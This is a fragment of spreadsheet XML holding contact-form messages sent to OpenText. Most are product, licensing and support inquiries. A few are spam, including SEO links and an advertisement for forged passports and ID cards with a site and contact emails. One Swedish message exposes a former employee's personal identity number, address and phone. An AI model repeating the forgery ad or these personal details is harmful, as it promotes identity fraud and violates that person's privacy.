We are currently using Unify Team Developer 5.2 and we would like to receive quote to upgrade the product to latest Team Developer 7 release. Below is our license number we found from archives. It would be a 3 license pack. Can you please also quote your support offerings / how long support/upgrades does the license include?_x000D_
_x000D_
Please respond via e-mail._x000D_
_x000D_
Thanks!_x000D_
Hannu_x000D_
_x000D_
Licence Number	SKU	Description	_x000D_
10900740	62-9003-5200	Upgrade Team Developer 3-Pack for Windows	</t>
  </si>
  <si>
    <t>We currently use Brava Reader (Free) to Print our PDF and TIFF drawing files to an old OCE A0 Plotter. We find it works much better than Adobe Acrobat reader for printing. However every so often we have to reinstall the software. Is there a way of installing it without this limitation? We don't need it to do anything other than print. If there is a cost involved please let me know what it is for 1 license and 5 licenses_x000D_
Thanks_x000D_
Craig Wright_x000D_
Froude Limited</t>
  </si>
  <si>
    <t>Hello.  We are investigating the possibilities in replacing our existing artwork management system (Digital Asset Management).  OpenText has been suggested as a potential candidate and we would be interested in a demonstration.</t>
  </si>
  <si>
    <t>Since 2008 our companies (Leca) have been a part of the Industrial Mortar business (Weber) in Saint-Gobain, and we have used LiveLink (OpenText Content Server) for document handling and project management (KineMatik). _x000D_
Currently the Leca group is for sale, and might leave Saint-Gobain within short._x000D_
After the split we would like to continue using LiveLink as a tool in our companies for sharing documents and handling project management, thus we need to have licenses independent of Saint-Gobain. The server location will be Copenhagen. As of 2018 we need 15-20 licenses._x000D_
Could you please give us an offer on how to manage this transition.</t>
  </si>
  <si>
    <t>Greeting From BR Softech Pvt Ltd_x000D_
        Hope You're Doing Great _x000D_
_x000D_
BR Softech Pvt. Ltd. is top leading Web, Game and Mobile Apps Development Company having our registered office in Jaipur, India. Our developers has an extensive knowledge in cryptocurrency exchange software &amp; crypto wallet mobiile apps development solutions based on the need of our customers._x000D_
_x000D_
Our Cryptocurrency Development Services :_x000D_
Bitcoin Wallet Development_x000D_
Bitcoin Software Development_x000D_
Crypto Coin Creation_x000D_
Crypto Coin Mining_x000D_
Bitcoin Exchange Platform_x000D_
Crypto Wallet Development_x000D_
Exchange Software Development_x000D_
Bitcoin Pool Mining_x000D_
Crypto Explorer_x000D_
Coin Admin Development_x000D_
_x000D_
Looking professionals for Bitcoin and cryptocurrency software development ?  Get the most affordable Cryptocurrency System and trading software, Get a Live demo first and hire us later as per your budget and plans. Visit: http://bit.ly/2kn8EMp  #Bitcoin #cryptocurrency #cryptocurrencySystem #Cryptocurrencysoftware #cryptocurrencydevelopmentcompany #cryptocurrency #cryptocurrencies #Bitcoin #Ethereum #Ripple #BitcoinCash #Litecoin_x000D_
_x000D_
_x000D_
Hire Our Expert Developer and Designer for all crypto currency solution._x000D_
_x000D_
Portfolio Showcase: https://www.brsoftech.com/portfolio/mobile-portfolio.html_x000D_
_x000D_
Cryptocurrency Development: https://www.brsoftech.com/cryptocurrency-development.html_x000D_
_x000D_
Crypto MLM Solution: https://www.brsoftech.com/bitcoin-mlm-software-development.html_x000D_
_x000D_
We are looking forward to hear from you._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Name: rozy roj_x000D_
E-mail:  rozyroj@gmail.com, nitin@brsoftech.com_x000D_
Skype: bdm.br_x000D_
Mob: +91-9982201414 ( Whatsapps )_x000D_
USA: +1-615-727-6690_x000D_
Website: http://www.brsoftech.com</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Deux de nos clients en maintenance ToIP disposent de solutions Rightfax. Dans le cadre d'un projet d'évolution de la solution de téléphonie, je souhaiterais échanger avec un correspondant Rightfax._x000D_
_x000D_
Merci d'avance pour votre retour._x000D_
Cordialement,_x000D_
K.GUILLAUME_x000D_
0620696887</t>
  </si>
  <si>
    <t>Vorrei valutare l'acquisto della più recente versione di Teleform</t>
  </si>
  <si>
    <t>Hej!_x000D_
_x000D_
Jag skulle behöva hjälp med en signatur från Open Text AB inför att flytta min pensionsförsäkring. Kan ni hjälpa mig med det eller tala om vart jag ska vända mig?_x000D_
_x000D_
Dorothea Ramstedt_x000D_
Tidigare anställd på Open Text AB_x000D_
670215-4904_x000D_
Sösbacken 36_x000D_
SE-427 34 Billdal_x000D_
+46 703 467476_x000D_
_x000D_
Nuvarande arbetsgivare är Recorded Future AB._x000D_
_x000D_
Med vänlig hälsning_x000D_
Dorothea Ramstedt</t>
  </si>
  <si>
    <t>Dear,_x000D_
We are currently using Brava Free DWG viewer._x000D_
As this is an expirering tool we would like to upgrade to Brava! Desktop DXP autocad only._x000D_
Is it possible to get a quotation for 50 concurrent users?_x000D_
Best regards,_x000D_
Olivier</t>
  </si>
  <si>
    <t>Lasdrop Bellows AR-25mm-VI 25mm shaft, 38-54mm stern tube dripless shaft seal attached to a 24mm steel shaft, connected to the gearbox of aYanmar 3YM30  30 hp Diesel engine. Our yacht is a Jeanneau Sunrise 34. The seal is leaking badly and 2 shipyards have checked the seal but it is gushing water from the seal itself. The Yanmar 3YM30 Diesel engine vibrates on its mountings quite a lot- the engine has been lowered.  We have also realigned the new 24mm shaft with the gearbox and replaced the cutlass bearing. One yard suggests we buy a Volvo Penta dripless seal bearing instead but we want this seal to work! - has anyone any ideas on how to solve this problem?</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Our company is a unique producer of quality fake documents. _x000D_
We offer only original high-quality fake passports, driver's licenses, ID cards, stamps and other products for a number of countries like: _x000D_
USA, Australia, Belgium, Brazil, Canada, Italy, Finland, France, Germany, Netherlands, Spain, United Kingdom. This list is not full. _x000D_
 _x000D_
To get the additional information and place the order just visit our website: _x000D_
 _x000D_
http://www.salepassportsfake.cc www. salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
&gt;&gt; Contact e-mails: _x000D_
 _x000D_
 _x000D_
General support: support@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
Technical support: admin@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
 _x000D_
----------------------------- _x000D_
Keywords: _x000D_
 _x000D_
sell false/fake ID card of Afghanistan _x000D_
sell false/fake ID card of Albania _x000D_
sell false/fake ID card of Algeria _x000D_
sell false/fake ID card of Andorra _x000D_
sell false/fake ID card of Angola _x000D_
sell false/fake ID card of Antigua &amp; Deps _x000D_
sell false/fake ID card of Argentina _x000D_
sell false/fake ID card of Armenia _x000D_
sell false/fake ID card of Australia _x000D_
sell false/fake ID card of Austria _x000D_
sell false/fake ID card of Azerbaijan _x000D_
sell false/fake ID card of Bahamas _x000D_
sell false/fake ID card of Bahrain _x000D_
sell false/fake ID card of Bangladesh _x000D_
sell false/fake ID card of Barbados _x000D_
sell false/fake ID card of Belarus _x000D_
sell false/fake ID card of Belgium _x000D_
sell false/fake ID card of Belize _x000D_
sell false/fake ID card of Benin _x000D_
sell false/fake ID card of Bhutan _x000D_
sell false/fake ID card of Bolivia _x000D_
sell false/fake ID card of Bosnia Herzegovina _x000D_
sell false/fake ID card of Botswana _x000D_
sell false/fake ID card of Brazil _x000D_
sell false/fake ID card of Brunei _x000D_
sell false/fake ID card of Bulgaria _x000D_
sell false/fake ID card of Burkina _x000D_
sell false/fake ID card of Burundi _x000D_
sell false/fake ID card of Cambodia _x000D_
sell false/fake ID card of Cameroon _x000D_
sell false/fake ID card of Canada _x000D_
sell false/fake ID card of Cape Verde _x000D_
sell false/fake ID card of Central African Rep _x000D_
sell false/fake ID card of Chad _x000D_
sell false/fake ID car</t>
  </si>
  <si>
    <t>Hi Open text, _x000D_
_x000D_
We are looking for potential Vendor who can build the complete solution involving the following:_x000D_
1. Automate navigation of website_x000D_
2. Screen scrape details from the site_x000D_
3. Make payment to obtain document_x000D_
4. Download, OCR and extract details from the document_x000D_
5. Apply business rules to the extracted data_x000D_
_x000D_
It would be good to hear from you if you can help us achieve the following?_x000D_
_x000D_
Thanks,_x000D_
Vish</t>
  </si>
  <si>
    <t>Hi Opentext, _x000D_
_x000D_
We are looking for potential Vendor who can build the complete solution involving the following:_x000D_
1. Automate navigation of website_x000D_
2. Screen scrape details from the site_x000D_
3. Make payment to obtain document_x000D_
4. Download, OCR and extract details from the document_x000D_
5. Apply business rules to the extracted data_x000D_
_x000D_
It would be good to hear from you if you can help us achieve the following?_x000D_
_x000D_
Thanks,_x000D_
Vish</t>
  </si>
  <si>
    <t>Hello good afternoon._x000D_
Our company has Alfresco Share v5.1.f - Alfresco Community v5.1.0 and we need to be able to make notes on the word, pdf documents, from the Alfresco viewer. You can integrate? we would like to know the costs of this integration. It is for a company in Colombia with approximately 60 concurrent users._x000D_
_x000D_
I remain attentive to your response._x000D_
_x000D_
thank you very much</t>
  </si>
  <si>
    <t>I am looking for a program that will store land files, the many documents, and allow the employees to search for said documents. _x000D_
_x000D_
Ideally the program would additionally be able to be linked to our mapping program so relevant data can be uploaded into that system._x000D_
_x000D_
Thank you,_x000D_
Megan</t>
  </si>
  <si>
    <t>Inquire about Captiva products</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get into your website to setup a new trading partner. I used to have a user/password but left the company to 2 years and now back. My email/user is asselin@bow-group.com  . </t>
  </si>
  <si>
    <t>To: Human Resources_x000D_
_x000D_
_x000D_
University Schooled_x000D_
English Fluent are in Philippine_x000D_
 _x000D_
IBM Maximo 21  Years – SAP Financial/Maintenance  in Years_x000D_
Math 30 US Doolars_x000D_
 _x000D_
20 Accountings US Dollars_x000D_
30 Programmers US Dollars_x000D_
35 Financials US Dollars_x000D_
35 Legals US Dollars_x000D_
Vacation, nope; Sick nope; EEO nope._x000D_
American Philippines Richard Taggs – President</t>
  </si>
  <si>
    <t>does Brava! Desktop have an add-on or some way of viewing AutoCAD Civil 3D 2016 drawings?</t>
  </si>
  <si>
    <t>preciso saber o custo de algumas licenças:_x000D_
archive_x000D_
IXOS_x000D_
EcoSystem_x000D_
_x000D_
att,</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
I’m just following up on a previous email that I sent out regarding the participation of OpenText in the Marathon Relay Challenge at the 2018 Mississauga Marathon, which takes place from May 4-6, 2018. There is still plenty of time for you and your team to join the event, but the sooner you register your team, the more money you can save on registration costs. We would love to have your company involved with the Mississauga Marathon this year as one of the relay teams, so please let us know if you are interested in joining. _x000D_
_x000D_
I’ve attached our Information Package, but if you have any questions, please let me know._x000D_
_x000D_
Have a great day,_x000D_
</t>
  </si>
  <si>
    <t>We need a license or a trial version of OpenText in order to implement an integrator component that extracts documents via OpenText's REST API.</t>
  </si>
  <si>
    <t>Dear OpenText Team, _x000D_
_x000D_
I want to take the StreamServe Developer Exam and therefore I'd like to have some questions answered._x000D_
Is it neccessary to pass the classes 3-3710 &amp; 3-3715 or is it only a recommendation? _x000D_
If I buy the Developer Exam how long time do I have to take it (before I have to start)? _x000D_
Are they special requirements for the exam, which I should know? (Java, Browser, OS, no active Skype etc.)_x000D_
Do I get some course materials or is it the key for the exam only?_x000D_
Is a retest on failure possible? _x000D_
_x000D_
Best Regards, _x000D_
_x000D_
Manuel</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam, _x000D_
_x000D_
The Co-operative Group are in the process of setting up a new system to manage our transactions with suppliers. As such we will be sending out an email with further information by the end of November to all of our suppliers, such as yourselves. _x000D_
_x000D_
To ensure the email we will send reaches the correct department, please could you provide the following details for us to contact your Account Manager handing the relationship between Open Text and the Co-operative Group? _x000D_
-	Name:_x000D_
-	Role:_x000D_
-	Email Address:_x000D_
-	Telephone:_x000D_
_x000D_
Additionally, please could you advise whether there is a generic email address for contacting the Accounts Receivable Team?_x000D_
_x000D_
Thank you for your assistance, I look forward to hearing from you soon._x000D_
_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Andrew Heaney_x000D_
Supplier Enablement Administrator_x000D_
Procurement_x000D_
</t>
  </si>
  <si>
    <t>I have had problem with access to my Support._x000D_
Even, I have confirmed throughout e-mail registration. I cannot manager to access my support.</t>
  </si>
  <si>
    <t>Specifically, we are seeking information on how your product supports case work and enterprise content management. For this analysis, we gleaned a set of capabilities from a survey of products on the market. Four broad capability areas of interest include: 1) Case management, including managing complex relationships between multi-action cases 2) Document management, 3) Search document repository, and 4) Case files relationship management.</t>
  </si>
  <si>
    <t>I have a critical Issue on customer site and i cannot login to open text using the customer account to open SR_x000D_
_x000D_
D2 core method in the log say it's not found but it is found and i can see it from DA_x000D_
_x000D_
may you help me please</t>
  </si>
  <si>
    <t>Open Text Quotes required</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'd like to know if you'd be interested in selling the domain name visibleshift.com to me. I will be starting my own independent consulting business in the next few months and would like to use the domain for my website._x000D_
_x000D_
Please let me know if you'd consider my offer or direct me to the appropriate point of contact._x000D_
_x000D_
Thank you!_x000D_
Calvin Williams_x000D_
(404) 480-2307</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
One of our clients has use case where uploaded documents should be scanned for viruses before uploading to content server._x000D_
Judging by description, PVA virus scan integration module could be a perfect fit. Can you provide estimated price for Virus Scan integration module license and maintenance fee?_x000D_
Content Server version at this point is 10.5 but will be upgraded soon to 16.2._x000D_
_x000D_
Licensing is per server/instance or per user?_x000D_
_x000D_
Best regards,_x000D_
_________________________________________x000D_
Edgars Alksnis _x000D_
Partner / Consultant _x000D_
_x000D_
+371 26578220 (mobile)_x000D_
Jurkalnes 15, Riga, LV-1046, Latvia_x000D_
_x000D_
RIGA | TALLINN | VILNIUS_x000D_
</t>
  </si>
  <si>
    <t>Is it possible to buy a single license of ProVision? Am consultant  and used product for almost 20 years and semi-retired, but would like to buy single license for use. Thanks Griffin</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
The legal team here at Brewin DOlphin which consists of 5 lawyers 1 paralegal and 1 PA. We need a new system for our legal department so that all contracts can be filled in a correct order. We also need to be able to have options to see what has only been partially executed etc so we can chse them. If we could arrange a meeting for someone to come and speak to us about our needs that would be great._x000D_
_x000D_
Kind regards,_x000D_
Isabelle Williams-North </t>
  </si>
  <si>
    <t>Application for internship</t>
  </si>
  <si>
    <t>We as Muntajat located at Qatar are in the process of carrying out a POC for a Document Management system, as per Gartner research your company is listed in the top quadrant and we would like to reach out to your sales team. If you could be kind enough to send us the details of the contact person in your sales team whom we cam reach to, for getting further information on the product.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I forgot and lost my fax number. Can you resend it to me?_x000D_
</t>
  </si>
  <si>
    <t>Do you have an partner in italy ?_x000D_
best regards_x000D_
Gianfranco Misuriello</t>
  </si>
  <si>
    <t>Hi! We are a Norwegian Company who is looking into several DAM-systems, as we are considering implementing a DAM for our company. In this regard, your name has showed up, and we have a few questions that we would like to know initially._x000D_
_x000D_
1. Do you have any Norwegian customers? Good support options in Norway?_x000D_
2. How is your integration with Enonic XP, which is our CMS?</t>
  </si>
  <si>
    <t xml:space="preserve">FIRE EXTINGUISHERS SERVICES AND NEW SUPPLYS </t>
  </si>
  <si>
    <t>Hej,  _x000D_
VI är kunder till er och har en StreamServe lösning. Jag jobbar just nu med ett rensningsprojekt för VCRS Operation and Maintenance och skulle vilja att er kundanasvarige för VCRS ringer mig. Jag skulle vilja boka in ett heldagsmöte - där huvuddelen är att tillsammans med oss genomföra en workshop för att se hur vi kan rensa ut föråldrad data ur StreamServe på bästa sätt. _x000D_
_x000D_
Ser fram emot ert samtal _x000D_
_x000D_
Med vänliga hälsningar_x000D_
_x000D_
Kicki Hagstedt</t>
  </si>
  <si>
    <t>Purchase of Brava Desktop</t>
  </si>
  <si>
    <t>OpenText Teamsite upgrade compatibility, Available licenses, Licenses pricing</t>
  </si>
  <si>
    <t xml:space="preserve">how much the cost for in-house program. to bring you in our compay to deliver the below training_x000D_
 5-0162 OpenText Administrator Certification Bootcamp _x000D_
please waiting your response _x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is John Latham and I am the new director at Platinum Fitness. Great to be here._x000D_
_x000D_
I was reaching out to you to let you know about a drawing we are having.  _x000D_
_x000D_
On December 7 we are having a drawing with your employees. I person is going to get a 90 day free membership from us. _x000D_
_x000D_
The rules are as follows. _x000D_
_x000D_
We must have 15 entries from your team. We would need their full name, address, and phone number.  We have to draw the person. _x000D_
Must be 18 years or older._x000D_
The membership is none transferable. _x000D_
Must live within a 10 mile radius of the Plesanton location. _x000D_
_x000D_
That is it. We look forward to hearing from you. We would be glad to stop in or you can stop by for a free boot camp session._x000D_
_x000D_
Look forward to burning some calories together. _x000D_
_x000D_
Thank you,_x000D_
John Latham_x000D_
8053771129</t>
  </si>
  <si>
    <t xml:space="preserve">Ремонт техники Apple (iPhone, iPad, Mac) _x000D_
 _x000D_
&lt;a href=https://ihelp-store.ru/remont-ayfonov-v-yuzhnom-butovo-ihelp-store.php&gt;ремонт айфонов в южном бутово&lt;/a&gt;_x000D_
&lt;a href=https://ihelp-store.ru/remont-ayfonov-v-yuzhnom-butovo-ihelp-store.php&gt;ремонт iphone в южном бутово&lt;/a&gt;_x000D_
 _x000D_
&lt;a href=https://ihelp-store.ru&gt;сервисный центр apple&lt;/a&gt;_x000D_
&lt;a href=https://ihelp-store.ru&gt;сервис ремонта айфонов&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in acquiring fax services for our health plan.   </t>
  </si>
  <si>
    <t>I am working with a local government in British Columbia.  We are looking at e-Discovery; Records Management and possibly file collaboration and sharing.  We need to be able to host on-premise and actively building our budget out right now and we are actively looking to implement in Q1 of next fiscal.</t>
  </si>
  <si>
    <t>I need a cloud based fax solution.  I'm willing to purchase immediately.</t>
  </si>
  <si>
    <t xml:space="preserve">Need some technical information on Exstream.  Can the software handle SVG files when managing print production.  </t>
  </si>
  <si>
    <t>Gostaria de saber se vocês possuem consultores com experiência em VIM/OpenText x SAP ECC 6.0 e que já tenham feito mudanças nesta solução para trabalhar com o novo layout de NFe 4.0. Caso afirmativo, me passar um telefone de contato para eu dar mais detalhes. Favor me contatar por email.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to find a side by side comparison DM 16.2 vs DM16.3 A white paper or something _x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>I've ported a number over to RightFax Express and I need to get it set up so I can get faxes coming in. Please let me know what I need to do next._x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve"> We are interesting on _x000D_
OpenText™Content Suite Platform_x000D_
for 2300 user/clients_x000D_
we need a licensing cost._x000D_
_x000D_
best regards_x000D_
Gianfranco_x000D_
</t>
  </si>
  <si>
    <t>Would like details of an EDI Value Added Network (VAN) mailbox cost plus translation software if you have a product that does translation.  We do not want a service, just the mailbox and mapping software.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I've requested My Support access since last friday and I'm still not able to download critical patches for our Documentum installation; Can you give me access please ? It's critical for our production environment.</t>
  </si>
  <si>
    <t>OpenText Vendor Invoice Management for SAP Solutions</t>
  </si>
  <si>
    <t>How do I register business opportunities for opentext?</t>
  </si>
  <si>
    <t>Can you please provide link for HP Exstream certification. I tried to go through HP link but it's asking me for learner id. Please let me know certification process.</t>
  </si>
  <si>
    <t>Seeking courses in Output Management for StreamServe. Have been working with StreamServe for some years. Feel the need for more formal education than what I have picked up along the way.  I am administrator doing design and minor scripting.</t>
  </si>
  <si>
    <t>I'm interesting in your RightFAX Enterprise Server solution. I'm currently using AVAYA aura communication manager and looking for the FAX server solution working with my phone system. May I have a quotation for RightFAX Enterprise Server?</t>
  </si>
  <si>
    <t xml:space="preserve">Data protection team in BA require Automated redaction that can be intuitive and also allow to email data to customers.  The cases we deal with are on an individual basis rather than large batch data, however, we may have to deal with large number of files or emails for each case. </t>
  </si>
  <si>
    <t>We woluld like to know more about Archive Center. We want to archive other document than the M3-documents we already archive from StreamServe.</t>
  </si>
  <si>
    <t xml:space="preserve">To better understand the capabilities of Exstream for document production, publishing and customer communication management. </t>
  </si>
  <si>
    <t xml:space="preserve">Conestoga College in Kitchener has issued a RFP for Document Management Services on Merx.  If this is of interest to you please download the document from Merx. _x000D_
Perian Tebbutt, </t>
  </si>
  <si>
    <t>Trying to download Brava Reader to take measurements on drawings.</t>
  </si>
  <si>
    <t>Riquest for Documentum Mantenance Quote for one of our customers</t>
  </si>
  <si>
    <t>Angebot für eine Lizenz Opentext Desktop Viewer (Spicer Imagenation)</t>
  </si>
  <si>
    <t>I have a client who wants integration between Salesforce (Sales Cloud) and OpenText._x000D_
I want to understand better the integration and pricing._x000D_
OBS: I speak english. So you can contact me in english._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
_x000D_
Hopefully you are doing well. I am Waly from INZ sourcing Bangladesh. I take your email id from linkedin. We are garments manufacture and buying agent in Bangladesh. We work with Mango, H&amp;M, Forever-21, YTS, Gloria Jean’s BallyClare Work wear (UK)  etc. We give you our best service &amp; competitive price. Please visit our web-www.inzsourcing.com._x000D_
If you possible to give us inquiry in garments items than we will grateful with you . ._x000D_
Would you create an opportunity for us? _x000D_
_x000D_
Looking forward your kind reply. _x000D_
WE NEVER COMPROMISE WITH QUALITY WHICH IS OUR BUSINESS MAIN MOTTO._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Can I ask for Matthias Niessen email adress please?_x000D_
_x000D_
Kind regards_x000D_
Lars Elmquist | Procurement Presales Senior Specialist - Nordics_x000D_
SAP Ariba | Procurement and Business Network_x000D_
lars.elmquist@sap.com | mobile: +45 29 23 31 27_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am emailing you on behalf of CLARITY, a not-for-profit organisation that manufacturers soap and other toiletry products. We have recently been looking into setting up an EDI system as we have been speaking with national retailers to provide them with products. I had a few questions regarding setting up an EDI system:_x000D_
_x000D_
-	What would the costs be?_x000D_
-	How long does it take set up an EDI system?_x000D_
-	Is it possible to set up use a 3rd party EDI system? _x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Shahriyar Rahman_x000D_
</t>
  </si>
  <si>
    <t>A empresa na qual estou trabalhando esta estudando a solução VIM, precisamos de documento que fale sobre a solução VIM e fale sobre a licença dela.</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Hi,_x000D_
 _x000D_
Hope you’re doing well!_x000D_
 _x000D_
I am Arthur Butler, I had a chance to go through your company’s website and I hope our newly updated Shared Service and Outsourcing Professionals Real Time Data can help you to Boost up your sales with our verified Direct Contact numbers and email contacts you can reach your Active Clients and increase your sales._x000D_
 _x000D_
So, would you be interested in connecting with Active Decision Makers?_x000D_
_x000D_
Target Titles:_x000D_
_x000D_
•	C-Level Executives_x000D_
•	Directors of Business Process Outsourcing_x000D_
•	Finance Directors_x000D_
•	Global Business Service Directors _x000D_
•	Head of Shared Services_x000D_
•	Heads of HR/IT/Finance/Procurement/Customer Services_x000D_
•	Head of Process/Excellence/Organizational Development/Delivery_x000D_
•	Business Development Managers_x000D_
•	Contracts and Supply Managers_x000D_
•	Procurement and Information Officers_x000D_
•	Outsourcing Advisors_x000D_
•	Business Services Projects/Sector Professionals_x000D_
•	Consultants_x000D_
•	Others allied to this Professional_x000D_
_x000D_
Segments:_x000D_
_x000D_
•	Procurement and Data Protection_x000D_
•	Sourcing Management_x000D_
•	Finance and Accounting_x000D_
•	Human Resource Services_x000D_
•	Logistics and Procurement_x000D_
•	IT Services_x000D_
•	Customer Service_x000D_
•	Data Management_x000D_
•	Business Administration and Support_x000D_
•	Global Shared Services Firms and Others_x000D_
_x000D_
You can fill in your exact Target criteria in the below mentioned format, So that I can get back to you with samples and benefits for your review._x000D_
 _x000D_
 Target Job Titles: _________ Target Industry: ______________   Target Geography: ______________x000D_
 _x000D_
We have complete contacts details and verified e-mail address across all industry._x000D_
 _x000D_
List includes: Company and Contact name, Title/Designation, Direct contact number, Verified email address, Mailing address, Fax number, Revenue size &amp; employee size, SIC/NAICS and more._x000D_
 _x000D_
List Details:_x000D_
 _x000D_
•	Format: Excel spreadsheet._x000D_
•	Quality: We provide up to 90% and anything less than that we replace with fresh contacts._x000D_
•	Benefits: Complete Ownership, Unlimited, Multichannel marketing._x000D_
 _x000D_
Look f</t>
  </si>
  <si>
    <t>Hello,_x000D_
I required support, I requested My Support for product Documentum for Metlife (Amslico) company._x000D_
I filled in form, successfully sent. But I haven't received any email._x000D_
Can you give me access to My Support please._x000D_
Thank you,_x000D_
Miroslav Ivan</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am part of DBI Services. We are OpenText partner. gerard.wisson@dbi-services.com is the contact person who can confirm._x000D_
Can you enable download for me?_x000D_
_x000D_
Regards,_x000D_
Olivier</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
We are exploring about a suitable BPM tool for our organization. We would like to know about contact person who can reach out to us to provide further details._x000D_
Regards</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich bin auf der Suche nach einem Ansprechpartner für die Erstellung eines unverbindlichen Angebots zur Wartung einer Captiva-Installation bei einem unserer Kunden._x000D_
Mit freundlichen Grüßen, Marko Damaschke</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry Free Dwg viewer product </t>
  </si>
  <si>
    <t>Одним из самых популярных видов облицовки пола является плитка напольная. Ассортимент этих материалов довольно широк и многообразен, поэтому выбрать плитку напольную становится все труднее, из-за богатства выбора. В настоящее время в магазине можно встретить от 15 наименований плитки, различной по диаметру и форме, подробнее об этом читайте на сайте [url=http://teletap.org]teletap.org[/url]</t>
  </si>
  <si>
    <t>Does OpenText AP invoice automation software integrate with NetSuite ERP? If yes, we would like to schedule a demo.</t>
  </si>
  <si>
    <t>Dear_x000D_
We need to propose right fax solution to one of our cutomer for that we need pricing detail and presale questioner to be shared with customer._x000D_
To get the complete detail from customer_x000D_
Thank you</t>
  </si>
  <si>
    <t>Как туплекс, так и пробка обладают прекрасными параметрами, поэтому многие люди затрудняются с правильным выбором. Пробка является экологически чистой, однако опасается воздействия воды, подробнее читайте на сайте [url=http://rempostroy.ru]rempostroy.ru[/url]</t>
  </si>
  <si>
    <t>We would like to update our billing information on file from Goldman Sachs Executive Clearing, Lp to the following:_x000D_
_x000D_
Attn: Account #_x000D_
Goldman Sachs &amp; Co_x000D_
PO Box 75_x000D_
New York, NY 10274</t>
  </si>
  <si>
    <t>Sales inquiry.  I have a customer that has an older version of Right Fax.  They'd like to get a new license and reached out to me.  I'm not sure if we're set up with you or not.</t>
  </si>
  <si>
    <t>We are having intermittent issues faxing to our cloud fax numbers. I tried to contact support, but they shut me down saying I didn't have a support contract, even though I explained we use the cloud service. Our account was originally with EasyLink, account number 89829. These issues are a major interruption to our business.</t>
  </si>
  <si>
    <t>Receiving an error message while viewing dwf file in html Viewer using C#</t>
  </si>
  <si>
    <t xml:space="preserve">Aquisição da plataforma Open Text. Entendimento de custos, tour, etc. </t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
my name is Fabio Fratti, and  I started  developing software in the_x000D_
SQL Windows/32 environment when still it was called Centura_x000D_
( further details –just in case- over here :_x000D_
https://www.linkedin.com/in/fabio-fratti-6aa108a8/  )_x000D_
Then Unify Corporation Team Developer succeeded ( www.unify.com ),  _x000D_
but nowadays it seems to me that “that” Unify is just mobile, cabling, _x000D_
connectivity, telephony, and so on._x000D_
While OpenText  has taken over. ( I’ve downloaded various_x000D_
Team_Developer_7.0_%%    pdf   files )_x000D_
Am I correct ?  Is definitely OpenText  the new Team Developer _x000D_
reference ?_x000D_
Thank you very much for your kind reply, faithfully yours,_x000D_
Fabio</t>
  </si>
  <si>
    <t>Hi. I've had communications with Actuate in the past (Ash Nanda and others) about potential opportunities. _x000D_
We are talking to a bank in Cambodia on a number of topics. I'm not absolutely 100% sure on requirements, but they have "big data" already (I assume they have some way of getting data out of systems and live applications) and are looking for a BI tool to develop reports and views. Is this the sort of thing Actuate would be interested in? If so, let me know - maybe provide some collateral to me to get an idea of what is possible, then I can speak to the bank in more detail. I think they have looked at Oracle and MS solutions and found them too expensive._x000D_
_x000D_
Thanks_x000D_
_x000D_
Noel Stubbs</t>
  </si>
  <si>
    <t>Good morning, _x000D_
_x000D_
My name is Katelyn, and I am a social work intern at Mennonite Central Committee Ontario, working in their Circle of Friends Program.  Circle of Friends is a program of MCCO that supports individuals who are transitioning out of homelessness. We provide friendship-based support for individuals through a network of trained volunteers. Typically, a Circle consists of 2 or 3 volunteers, one staff person, and one “participant”. The group meets once a week for a year, usually over coffee, though some circles are more active, and end up meeting for considerably longer.  We also provide many other opportunities for participants to experience/build community integration in their lives. For more information, check out https://mcccanada.ca/stories/circle-friends _x000D_
_x000D_
Each year we host a Christmas party for our participants.  The holiday season is a very difficult time for many of our participants, especially for those that do not have family events to attend.  With your help, we hope to give our participants a gift this Christmas.  It is our goal to create an evening of warmth and friendship in a season which is often quite isolating and lonely for the most vulnerable community members. _x000D_
_x000D_
Some examples of what we’ve given in the past include warm socks, hats and mitts, shampoo and other toiletries, hot chocolate or some other festive treat among others.  A cup of hot cocoa or a warm hat can go a long way to bring comfort to our members. Any contribution would be greatly appreciated and we would be happy to accept cash donations or physical items.  _x000D_
_x000D_
We look forward to hearing from you.  Feel free to contact myself at this email address, or the number below.  If I am unavailable please contact my supervisor Katie Taylor at Katie.taylor@mcco.ca or at 519-745-8458 ext. 221._x000D_
_x000D_
Warmly, _x000D_
_x000D_
Katelyn LaCroix_x000D_
MSW Intern_x000D_
Circle of Friends Program, Indigenous Neighbours Program_x000D_
Mennonite Central Committee Ontario_x000D_
203-50 Kent Ave., Kitchener, ON N2G 3R1_x000D_
Office:</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Content Management Software Users?_x000D_
_x000D_
